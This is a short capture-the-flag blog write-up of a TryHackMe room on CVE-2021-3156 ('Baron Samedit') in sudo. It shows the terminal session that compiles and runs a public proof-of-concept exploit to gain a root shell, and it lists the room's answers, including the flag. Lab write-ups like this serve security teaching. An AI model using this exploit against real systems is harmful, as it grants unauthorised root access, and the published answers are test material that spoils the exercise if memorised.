---
layout: post
title: "Baron Samedit - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - sudo
date: 2021/02/06 15:29:00
thumbnail: /images/TryHackMe/sudovulnssamedit.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Baron Samedit
- **Profile:** [tryhackme.com](https://tryhackme.com/room/sudovulnssamedit)
- **Difficulty:** Easy
- **Description**: A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series

![Baron Samedit](/images/TryHackMe/sudovulnssamedit.png)

# Write-up

## Baron Samedit

> After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?

Answer: {% spoiler `sudo-hax-me-a-sandwich` %}

Funny name for the exploit:

```plaintext
tryhackme@CVE-2021-3156:~/Exploit$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
tryhackme@CVE-2021-3156:~/Exploit$ ls
Makefile  README.md  hax.c  lib.c  libnss_X  sudo-hax-me-a-sandwich
```

> Run the exploit!
>
> You should now have a root shell -- what is the flag in /root/flag.txt?

After compiling the exploit we just have to run it to exploit CVE-2021-3156:

Answer: {% spoiler `THM{NmU4OWYwMWJmMjkxMDdiYTU4MWIxNWVk}` %}

```plaintext
tryhackme@CVE-2021-3156:~/Exploit$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id 
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
# cat /root/flag.txt
```
